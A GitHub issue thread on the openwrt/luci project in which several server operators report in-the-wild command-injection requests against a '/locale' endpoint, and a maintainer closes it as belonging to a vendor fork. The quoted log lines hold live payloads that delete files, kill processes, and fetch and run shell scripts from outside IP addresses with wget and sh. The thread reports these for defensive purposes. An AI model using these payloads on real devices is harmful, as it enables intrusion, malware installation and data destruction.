openwrt/luci #6977: Unix Command Injection exploited

yyvess, 2024-03-11:
I discovery this request on our servers that seem target Luci. I checked on CVE database and it's was not clear if that issue was fixed then I prefer to inform you.

`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`

`wget found :country: $(rm -rf *; cd /tmp; wget http://94.156.8.244/tenda.sh; chmod 777 tenda.sh; ./tenda.sh)`

Best

jow-, 2024-03-11:
No official version of LuCI ever featured as `/locale` endpoint, this is part of some proprietary vendor fork.

closed 2024-03-11 by jow-

rgaricano, 2024-09-23:
today I have another similar on end server:
INFO:     185.224.128.83:38138 - "GET /cgi-bin/luci/%3Bstok%3D/locale?form=country&operation=write&country=id%3E%60for+pid+in+%2Fproc%2F%5B0-9%5D%2A%2F%3B+do+pid%3D%24%7Bpid%25%2F%7D%3B+pid%3D%24%7Bpid%23%23%2A%2F%7D%3B+exe_path%3D%24%28ls+-l+%2Fproc%2F%24pid%2Fexe+2%3E%2Fdev%2Fnull+%7C+awk+%27%7Bprint+%24NF%7D%27%29%3B+if+%5B%5B+%24exe_path+%3D%3D+%2A%2F+%5D%5D%3B+then+kill+-9+%24pid%3B+fi%3B+done%3B%60 HTTP/1.1" 200 OK
... 
translated:
file:///cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id>for pid in /proc/[0-9]*/; do pid=${pid%/}; pid=${pid##*/}; exe_path=$(ls -l /proc/$pid/exe 2>/dev/null | awk '{print $NF}'); if [[ $exe_path == */ ]]; then kill -9 $pid; fi; done;

Syazvinski, 2024-12-02:
Found same request on my server today

`INFO:     31.220.1.88:52732 - "GET /cgi-bin/luci/%3Bstok%3D/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.87.69%2Ft+-O-+|+sh%60) HTTP/1.1"`